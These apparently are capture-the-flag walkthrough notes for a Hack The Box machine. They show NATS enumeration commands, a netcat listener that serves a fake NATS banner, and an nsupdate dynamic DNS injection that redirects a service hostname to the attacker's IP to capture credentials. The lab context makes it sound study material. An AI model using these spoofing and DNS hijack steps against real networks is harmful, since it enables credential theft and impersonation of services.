NAT
to get account info
└─$ nats account info -s nats://$IP:4222 --user $USER --password '$PASS'to get stream
└─$ nats stream ls -s nats://$IP:4222 --user $USER --password '$PASS'To view the stream
└─$ nats stream -s nats://$IP:4222 --user $USER --password '$PASS' viewHijacking nats-svc.mirage.htb via Dynamic DNS Update
└─$ nc nat-svc.mirage.htb 4222
INFO {"server_id":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","server_name":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":832,"client_ip":"10.10.16.7","xkey":"XBZCN2J5PXXZKRARPYRMZDVKMUIYINPFJGAG5HDA62RTA5HJ77MRPBEV"}
-ERR 'Authentication Timeout'We started a listener on port 4222 (default NATS port):
└─$ echo 'INFO {"server_id":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","server_name":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":280,"client_ip":"10.129.248.59","xkey":"XBZCN2J5PXXZKRARPYRMZDVKMUIYINPFJGAG5HDA62RTA5HJ77MRPBEV"}' | nc -lvnp 4222
listening on [any] 4222 ...
#tldr
This sends a fake INFO banner (expected by NATS clients).
We're using Netcat (nc) to passively accept connections and reply.Hijack nats-svc.mirage.htb via Dynamic DNS
└─$ nsupdate
> server mirage.htb
> zone mirage.htb
> update add nats-svc.mirage.htb 3600 A 10.10.16.7
> send
> quitThis sends a DNS dynamic update, making nats-svc.mirage.htb resolve to our IP (10.10.16.7) instead of the real NATS server.
⚠️ Requires that the DNS server allows "nonsecure and secure" dynamic updates (as stated in the incident report).
After some time, we will get the cred
Last updated